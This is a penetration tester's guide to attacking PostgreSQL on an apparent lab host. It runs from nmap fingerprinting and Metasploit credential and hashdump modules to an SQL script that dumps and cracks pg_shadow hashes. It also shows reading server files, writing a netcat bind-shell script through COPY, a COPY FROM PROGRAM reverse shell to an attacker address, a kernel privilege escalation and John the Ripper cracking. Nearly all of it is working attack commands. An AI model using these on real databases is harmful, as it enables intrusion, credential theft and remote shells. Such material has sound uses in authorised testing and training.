A Penetration Tester’s Guide to PostgreSQL

Discovery and Version Fingerprinting

nmap -sV 192.168.100.11 -p 5432
PostgreSQL — Version Identification via Nmap
auxiliary/scanner/postgres/postgres_version
PostgreSQL — Version Identification

Discovery of Database Credentials

auxiliary/scanner/postgres/postgres_login
PostgreSQL — Discovery of Database Credentials

Database Access

psql -h 192.168.100.11 -U postgres
PostgreSQL — Database Access
  • Enumeration of Existing Databases
  • Enumeration of Database Users
  • Enumeration of Database Tables
  • Retrieving Table Contents
  • Retrieving Database Passwords
  • Dumping Database Contents
postgres=# \l
PostgreSQL — List Existing Databases
postgres=# \du
PostgreSQL — List Database Users
template1=# \dt
PostgreSQL — List Existing Tables (tables are per database, so connect to each one with \c <db> or -d <db> before listing)
template1=# SELECT * FROM users;
postgres=# SELECT usename, passwd FROM pg_shadow;
PostgreSQL — Retrieving Database Passwords (pg_shadow is readable only by superusers; the hashes are either md5 or SCRAM-SHA-256 verifiers)
pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
PostgreSQL — Dumping Database Contents
PostgreSQL — Database Enumeration via Metasploit
auxiliary/admin/postgres/postgres_sql
Metasploit — Executing PostgreSQL Commands
auxiliary/scanner/postgres/postgres_hashdump
Metasploit — Retrieve Postgres Server Hashes
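The enumeration above leans on psql meta-commands (\l, \du, \dt), which are not available through the postgres_sql module or through an injection point. The script below is an added example and not part of the original article: it does the same enumeration as catalog queries, adds the privilege checks that decide whether the file-read and command-execution techniques of the next section will work for the current role, and tries a small candidate list against the md5-format hashes on the box itself. It assumes the psql connection opened above (psql -h 192.168.100.11 -U postgres, run with -f); the candidate passwords are constructed for the example, and the pg_* role names exist only on PostgreSQL 11 or later (the query is written so it returns no rows, rather than an error, on older servers).

```sql
-- Added example, not from the original article: catalog enumeration and
-- privilege checks in plain SQL, usable via psql -f, the Metasploit
-- postgres_sql module or an injection point. Candidate passwords are constructed.

-- 1. Who are we and what can we do. Superuser makes every later step possible.
SELECT version();
SELECT current_user, session_user,
       current_setting('is_superuser') AS is_superuser;
SELECT current_setting('data_directory') AS data_directory;   -- superuser-only setting

-- 2. Databases (\l) and roles (\du) as catalog queries.
SELECT datname, pg_get_userbyid(datdba) AS owner, datallowconn
  FROM pg_database ORDER BY datname;
SELECT rolname, rolsuper, rolcreaterole, rolcreatedb, rolcanlogin, rolreplication
  FROM pg_roles ORDER BY rolsuper DESC, rolname;

-- 3. User tables (\dt) in the current database. Tables are per database, so
--    reconnect with \c <db> or -d <db> and repeat this for each one of interest.
SELECT table_schema, table_name
  FROM information_schema.tables
 WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
 ORDER BY 1, 2;

-- 4. File and program privileges. Superuser always has them; on PostgreSQL 11+
--    the predefined roles below grant them separately. Looking the roles up in
--    pg_roles instead of naming them in pg_has_role() yields no rows, rather
--    than an error, on older servers where they do not exist.
SELECT r.rolname, pg_has_role(current_user, r.oid, 'member') AS current_user_is_member
  FROM pg_roles r
 WHERE r.rolname IN ('pg_read_server_files', 'pg_write_server_files',
                     'pg_execute_server_program');

-- 5. Password hashes (superuser-only view). Two formats occur:
--      md5<32 hex>         'md5' || md5(password || rolname); default through 13
--      SCRAM-SHA-256$...   salted PBKDF2 verifier, default from 14; crack offline
SELECT usename, passwd FROM pg_shadow WHERE passwd IS NOT NULL;

-- 6. Try a small candidate list against the md5 hashes on the box itself, using
--    the server's own construction. The list is constructed for this example;
--    the role name is part of the hash, so each row is checked with its own name.
WITH candidates(pw) AS (
     VALUES ('postgres'), ('password'), ('admin'), ('123456')
)
SELECT s.usename, c.pw AS cleartext
  FROM pg_shadow s
  JOIN candidates c ON s.passwd = 'md5' || md5(c.pw || s.usename)
 WHERE s.passwd LIKE 'md5%';
```

Step 6 only covers md5 verifiers; SCRAM-SHA-256 hashes cannot be checked with core SQL functions and are better handed to an offline cracker together with the output of postgres_hashdump.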

Command Execution

postgres=# select pg_ls_dir('./');
PostgreSQL — Directory Listing
postgres=# select pg_read_file('PG_VERSION', 0, 200);
PostgreSQL — Reading Server Side Files
postgres=# CREATE TABLE temp(t TEXT);
postgres=# COPY temp FROM '/etc/passwd';
postgres=# SELECT * FROM temp limit 1 offset 0;
PostgreSQL — Reading Local Files
auxiliary/admin/postgres/postgres_readfile
PostgreSQL — Reading Local Files via Metasploit
postgres=# CREATE TABLE pentestlab (t TEXT);
postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
postgres=# SELECT * FROM pentestlab;
postgres=# COPY pentestlab(t) TO '/tmp/pentestlab';
PostgreSQL — Write File on the Host
chmod +x pentestlab
./pentestlab
Start Local Listener (the file is owned by the postgres OS user, since COPY writes as that user, and is executed from a shell on the host)
nc -vn 192.168.100.11 2346
python -c "import pty;pty.spawn('/bin/bash')"
PostgreSQL — Connect to Backdoor
exploit/linux/postgres/postgres_payload
PostgreSQL — Code Execution
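As an added example that is not part of the original article, the following psql script ties the file-read, file-write and command-execution primitives above together with the checks that decide whether each will work, and adds COPY ... PROGRAM, which runs a command directly instead of writing a script and executing it from a separate shell. It assumes the same psql session and the article's values (/etc/passwd, /tmp/pentestlab, port 2346); 192.168.100.1 is a hypothetical attacker address; COPY ... PROGRAM needs PostgreSQL 9.3 or later, and reading paths outside the data directory with pg_read_file/pg_ls_dir needs 11 or later.

```sql
-- Added example: file read, file write and command execution from psql, each
-- with the precondition that decides whether it works. Assumes the psql session
-- above; 192.168.100.1 is a hypothetical attacker host.

-- 0. Preconditions. Each primitive needs superuser, or on PostgreSQL 11+
--    membership in the matching predefined role (false/missing on older servers).
SELECT current_setting('is_superuser') AS superuser,
       coalesce((SELECT bool_or(pg_has_role(current_user, oid, 'member'))
                   FROM pg_roles WHERE rolname = 'pg_read_server_files'), false)
           AS can_read_server_files,
       coalesce((SELECT bool_or(pg_has_role(current_user, oid, 'member'))
                   FROM pg_roles WHERE rolname = 'pg_write_server_files'), false)
           AS can_write_server_files,
       coalesce((SELECT bool_or(pg_has_role(current_user, oid, 'member'))
                   FROM pg_roles WHERE rolname = 'pg_execute_server_program'), false)
           AS can_execute_programs;

-- 1. Read files. pg_ls_dir()/pg_read_file() resolve relative paths against the
--    data directory; before PostgreSQL 11 they refuse paths outside it even for
--    superusers, which is why the article reads /etc/passwd with COPY FROM.
--    COPY FROM loads one line per row, but its text format treats tabs as column
--    separators and backslashes as escapes, so use pg_read_binary_file() for
--    binary or tab-separated files.
SELECT pg_ls_dir('.');
SELECT pg_read_file('PG_VERSION', 0, 200);
SELECT pg_read_file(current_setting('hba_file'), 0, 8192);   -- auth rules, e.g. 'trust' entries; 11+ if outside the data dir
CREATE TEMP TABLE loot(line text);      -- TEMP: nothing is left behind in the catalog
COPY loot FROM '/etc/passwd';
SELECT line FROM loot
 WHERE line LIKE '%/bin/bash' OR line LIKE '%/bin/sh';      -- interactive accounts

-- 2. Write files. COPY TO writes as the OS user running the server (normally
--    'postgres'): the directory must be writable by it and the file is owned by
--    it. Text format escapes backslash, tab and newline, so a one-line payload
--    without those characters is written verbatim.
CREATE TEMP TABLE payload(t text);
INSERT INTO payload VALUES ('nc -lvvp 2346 -e /bin/bash');
COPY payload(t) TO '/tmp/pentestlab';

-- 3. Command execution without the write-then-execute round trip (9.3+).
--    COPY ... PROGRAM hands the string to /bin/sh as the postgres OS user;
--    FROM PROGRAM stores the command's stdout one line per row, TO PROGRAM feeds
--    the table to its stdin. Needs superuser or pg_execute_server_program.
CREATE TEMP TABLE cmd_out(line text);
COPY cmd_out FROM PROGRAM 'id; uname -a; ls -la /tmp';
SELECT line FROM cmd_out;

-- Reverse shell to the attacker's listener. stdout/stderr are detached and the
-- command is backgrounded, otherwise COPY blocks until the shell exits.
COPY cmd_out FROM PROGRAM 'nc -e /bin/bash 192.168.100.1 2346 >/dev/null 2>&1 &';
```

If step 0 shows neither superuser nor any of the roles, none of steps 1 to 3 will succeed and the session is limited to data access; the read and write primitives also stop at the filesystem permissions of the postgres OS user (for example /etc/shadow stays unreadable), which is where the privilege escalation below comes in.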

Privilege Escalation

user@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Searching Linux Kernel Exploits
Compile the Exploit and Retrieve PID of netlink
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
Create the run File in the /tmp Directory
chmod +x /tmp/run
nc -vn 192.168.100.11 2345
python -c "import pty;pty.spawn('/bin/bash')"
Receive the connection with Netcat
Metasploit Linux Privilege Escalation — netlink
Elevated Meterpreter Session — Root Privileges
Examining the Shadow File
john /root/Desktop/password.txt
john --show /root/Desktop/password.txt
Cracked Hashes

david hayter